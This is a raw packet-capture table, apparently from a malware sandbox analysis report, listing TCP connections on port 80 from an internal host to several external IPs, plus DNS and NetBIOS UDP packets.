                                                                                                            Dec 12, 2024 10:22:33.102696896 CET8049193146.88.233.115192.168.2.22
                                                                                                            Dec 12, 2024 10:22:33.102849007 CET4919380192.168.2.22146.88.233.115
                                                                                                            Dec 12, 2024 10:22:33.121078968 CET4919380192.168.2.22146.88.233.115
                                                                                                            Dec 12, 2024 10:22:33.240467072 CET8049193146.88.233.115192.168.2.22
                                                                                                            Dec 12, 2024 10:22:33.240525007 CET8049193146.88.233.115192.168.2.22
                                                                                                            Dec 12, 2024 10:22:33.240523100 CET4919380192.168.2.22146.88.233.115
                                                                                                            Dec 12, 2024 10:22:33.361015081 CET8049193146.88.233.115192.168.2.22
                                                                                                            Dec 12, 2024 10:22:33.361031055 CET8049193146.88.233.115192.168.2.22
                                                                                                            Dec 12, 2024 10:22:34.499677896 CET8049193146.88.233.115192.168.2.22
                                                                                                            Dec 12, 2024 10:22:34.499707937 CET8049193146.88.233.115192.168.2.22
                                                                                                            Dec 12, 2024 10:22:34.499982119 CET4919380192.168.2.22146.88.233.115
                                                                                                            Dec 12, 2024 10:22:34.631108999 CET4919380192.168.2.22146.88.233.115
                                                                                                            Dec 12, 2024 10:22:35.647038937 CET4919480192.168.2.22146.88.233.115
                                                                                                            Dec 12, 2024 10:22:35.766750097 CET8049194146.88.233.115192.168.2.22
                                                                                                            Dec 12, 2024 10:22:35.766824007 CET4919480192.168.2.22146.88.233.115
                                                                                                            Dec 12, 2024 10:22:35.774292946 CET4919480192.168.2.22146.88.233.115
                                                                                                            Dec 12, 2024 10:22:35.893619061 CET8049194146.88.233.115192.168.2.22
                                                                                                            Dec 12, 2024 10:22:37.055391073 CET8049194146.88.233.115192.168.2.22
                                                                                                            Dec 12, 2024 10:22:37.055465937 CET8049194146.88.233.115192.168.2.22
                                                                                                            Dec 12, 2024 10:22:37.055660009 CET4919480192.168.2.22146.88.233.115
                                                                                                            Dec 12, 2024 10:22:37.057468891 CET4919480192.168.2.22146.88.233.115
                                                                                                            Dec 12, 2024 10:22:37.176817894 CET8049194146.88.233.115192.168.2.22
                                                                                                            Dec 12, 2024 10:22:42.705225945 CET4919580192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:42.824704885 CET8049195217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:42.826107979 CET4919580192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:42.837428093 CET4919580192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:42.956825018 CET8049195217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:42.956924915 CET8049195217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:42.957237959 CET4919580192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:43.076576948 CET8049195217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:44.106810093 CET8049195217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:44.106861115 CET8049195217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:44.107064009 CET8049195217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:44.111175060 CET4919580192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:44.349597931 CET4919580192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:45.370650053 CET4919680192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:45.490041971 CET8049196217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:45.490103006 CET4919680192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:45.507126093 CET4919680192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:45.626651049 CET8049196217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:46.771797895 CET8049196217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:46.771863937 CET8049196217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:46.771945000 CET8049196217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:46.772124052 CET4919680192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:47.032728910 CET4919680192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:48.065143108 CET4919780192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:48.184736967 CET8049197217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:48.191235065 CET4919780192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:48.203142881 CET4919780192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:48.323288918 CET8049197217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:48.323303938 CET8049197217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:48.326210022 CET4919780192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:48.446197033 CET8049197217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:48.446213007 CET8049197217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:49.573703051 CET8049197217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:49.573735952 CET8049197217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:49.573774099 CET8049197217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:49.573797941 CET4919780192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:49.573858023 CET4919780192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:49.715903997 CET4919780192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:50.735047102 CET4919880192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:50.854547977 CET8049198217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:50.854706049 CET4919880192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:50.898576021 CET4919880192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:51.018076897 CET8049198217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:52.139718056 CET8049198217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:52.139734983 CET8049198217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:52.139744997 CET8049198217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:52.139754057 CET8049198217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:52.139774084 CET8049198217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:52.139786005 CET8049198217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:52.139889956 CET4919880192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:52.139889956 CET4919880192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:52.146217108 CET4919880192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:52.265531063 CET8049198217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:57.299331903 CET4919980192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:22:57.418812037 CET804919913.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:22:57.418886900 CET4919980192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:22:57.440946102 CET4919980192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:22:57.560323000 CET804919913.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:22:57.560381889 CET804919913.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:22:57.560386896 CET4919980192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:22:57.680082083 CET804919913.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:22:58.517735958 CET804919913.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:22:58.517748117 CET804919913.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:22:58.518579006 CET4919980192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:22:59.013556004 CET4919980192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:00.030478954 CET4920080192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:00.150639057 CET804920013.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:00.151175976 CET4920080192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:00.166151047 CET4920080192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:00.285578966 CET804920013.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:01.250957966 CET804920013.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:01.250996113 CET804920013.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:01.251058102 CET4920080192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:01.665554047 CET4920080192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:02.682390928 CET4920180192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:02.802135944 CET804920113.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:02.802544117 CET4920180192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:02.815015078 CET4920180192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:02.934669018 CET804920113.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:02.934695959 CET804920113.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:02.938091993 CET4920180192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:03.057595015 CET804920113.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:03.057607889 CET804920113.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:03.902789116 CET804920113.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:03.902928114 CET804920113.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:03.903000116 CET4920180192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:04.317553043 CET4920180192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:05.334836006 CET4920280192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:05.454554081 CET804920213.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:05.457645893 CET4920280192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:05.469290018 CET4920280192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:05.590600014 CET804920213.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:06.585774899 CET804920213.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:06.585844040 CET804920213.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:06.585920095 CET4920280192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:06.588057995 CET4920280192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:06.707570076 CET804920213.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:11.988796949 CET4920380192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:12.111881018 CET804920381.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:12.112001896 CET4920380192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:12.125231981 CET4920380192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:12.245421886 CET804920381.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:12.245501041 CET4920380192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:12.245522022 CET804920381.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:12.364850044 CET804920381.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:13.404472113 CET804920381.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:13.404536009 CET804920381.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:13.404778957 CET4920380192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:13.631017923 CET4920380192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:14.646842003 CET4920480192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:14.766381979 CET804920481.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:14.766469955 CET4920480192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:14.780477047 CET4920480192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:14.899883032 CET804920481.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:16.058168888 CET804920481.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:16.058299065 CET804920481.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:16.058769941 CET4920480192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:16.282792091 CET4920480192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:17.299225092 CET4920580192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:17.419477940 CET804920581.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:17.427174091 CET4920580192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:17.444489956 CET4920580192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:17.565726995 CET804920581.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:17.565763950 CET804920581.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:17.565887928 CET4920580192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:17.686242104 CET804920581.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:17.686253071 CET804920581.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:18.719711065 CET804920581.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:18.825026989 CET804920581.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:18.825078964 CET4920580192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:18.950376034 CET4920580192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:19.967243910 CET4920680192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:20.086694002 CET804920681.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:20.086854935 CET4920680192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:20.097759008 CET4920680192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:20.217123032 CET804920681.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:21.379368067 CET804920681.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:21.379441023 CET804920681.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:21.384078026 CET4920680192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:21.384838104 CET4920680192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:21.504900932 CET804920681.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:26.640429020 CET4920780192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:26.759856939 CET8049207172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:26.759933949 CET4920780192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:26.874097109 CET4920780192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:26.993510962 CET8049207172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:26.993562937 CET4920780192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:26.993571997 CET8049207172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:27.113168001 CET8049207172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:28.043258905 CET8049207172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:28.043275118 CET8049207172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:28.043338060 CET8049207172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:28.043387890 CET4920780192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:28.043541908 CET4920780192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:28.372808933 CET4920780192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:29.389194965 CET4920880192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:29.508771896 CET8049208172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:29.511334896 CET4920880192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:29.529061079 CET4920880192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:29.648416996 CET8049208172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:30.781925917 CET8049208172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:30.781943083 CET8049208172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:30.781995058 CET4920880192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:30.782459974 CET8049208172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:30.782504082 CET4920880192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:31.040435076 CET4920880192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:32.059189081 CET4920980192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:32.178558111 CET8049209172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:32.178718090 CET4920980192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:32.190774918 CET4920980192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:32.310069084 CET8049209172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:32.310126066 CET4920980192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:32.310194016 CET8049209172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:32.429490089 CET8049209172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:32.429550886 CET8049209172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:33.441935062 CET8049209172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:33.441951036 CET8049209172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:33.442169905 CET4920980192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:33.442764997 CET8049209172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:33.442868948 CET4920980192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:33.702718019 CET4920980192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:34.710078001 CET4921080192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:34.830539942 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:34.830625057 CET4921080192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:34.840564966 CET4921080192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:34.959959030 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.102161884 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.102205992 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.102217913 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.102341890 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.102365017 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.102404118 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.102416992 CET4921080192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:36.102421045 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.102494001 CET4921080192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:36.102580070 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.102591038 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.102597952 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.102646112 CET4921080192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:36.104136944 CET4921080192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:36.221756935 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.221771955 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.221883059 CET4921080192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:36.294348955 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.294363976 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.294469118 CET4921080192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:36.298501968 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.298650026 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.298719883 CET4921080192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:36.307044983 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.307189941 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.307271957 CET4921080192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:36.315174103 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.315330982 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:36.315402985 CET4921080192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:36.318205118 CET4921080192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:36.439037085 CET8049210172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:42.251043081 CET4921180192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:42.370660067 CET8049211172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:42.370738029 CET4921180192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:42.382726908 CET4921180192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:42.502312899 CET8049211172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:42.502367020 CET4921180192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:42.502413034 CET8049211172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:42.622298956 CET8049211172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:43.603740931 CET8049211172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:43.603996038 CET8049211172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:43.604069948 CET4921180192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:43.604129076 CET8049211172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:43.604171038 CET4921180192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:43.894856930 CET4921180192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:45.323968887 CET4921280192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:45.443947077 CET8049212172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:45.444010973 CET4921280192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:45.458267927 CET4921280192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:45.577503920 CET8049212172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:46.671324015 CET8049212172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:46.671688080 CET8049212172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:46.671806097 CET4921280192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:46.968126059 CET4921280192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:47.984899044 CET4921380192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:48.105345964 CET8049213172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:48.105947971 CET4921380192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:48.118287086 CET4921380192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:48.237627983 CET8049213172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:48.237741947 CET4921380192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:48.237756014 CET8049213172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:48.357028008 CET8049213172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:48.357212067 CET8049213172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:49.334330082 CET8049213172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:49.335040092 CET8049213172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:49.335081100 CET4921380192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:49.620090008 CET4921380192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:50.636403084 CET4921480192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:50.755723953 CET8049214172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:50.759104013 CET4921480192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:50.767215014 CET4921480192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:50.886512995 CET8049214172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:51.985297918 CET8049214172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:51.985342026 CET8049214172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:51.985548973 CET8049214172.67.145.234192.168.2.22
                                                                                                            Dec 12, 2024 10:23:51.985546112 CET4921480192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:51.986865044 CET4921480192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:51.987467051 CET4921480192.168.2.22172.67.145.234
                                                                                                            Dec 12, 2024 10:23:52.106905937 CET8049214172.67.145.234192.168.2.22

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 12, 2024 10:19:34.966670036 CET138138192.168.2.22192.168.2.255
                                                                                                            Dec 12, 2024 10:20:13.805001020 CET5278153192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:20:14.487454891 CET53527818.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:20:19.632810116 CET6392653192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:20:20.142815113 CET53639268.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:20:20.143145084 CET6392653192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:20:20.652255058 CET53639268.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:20:20.652456999 CET6392653192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:20:20.786238909 CET53639268.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:20:25.767843008 CET137137192.168.2.22192.168.2.255
                                                                                                            Dec 12, 2024 10:20:26.523175001 CET137137192.168.2.22192.168.2.255
                                                                                                            Dec 12, 2024 10:20:27.287475109 CET137137192.168.2.22192.168.2.255
                                                                                                            Dec 12, 2024 10:20:31.610902071 CET6551053192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:20:31.850424051 CET53655108.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:20:46.232160091 CET6267253192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:20:46.863133907 CET53626728.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:21:01.257534981 CET5647553192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:21:01.407386065 CET53564758.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:21:02.422164917 CET4938453192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:21:02.573925018 CET53493848.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:21:03.592145920 CET5484253192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:21:03.741609097 CET53548428.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:21:04.750890017 CET5810553192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:21:04.903347015 CET53581058.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:21:09.955506086 CET6492853192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:21:10.329721928 CET53649288.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:21:10.330809116 CET137137192.168.2.22192.168.2.255
                                                                                                            Dec 12, 2024 10:21:11.095069885 CET137137192.168.2.22192.168.2.255
                                                                                                            Dec 12, 2024 10:21:11.856901884 CET137137192.168.2.22192.168.2.255
                                                                                                            Dec 12, 2024 10:21:13.638585091 CET5739053192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:21:13.774641991 CET53573908.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:21:13.777545929 CET137137192.168.2.22192.168.2.255
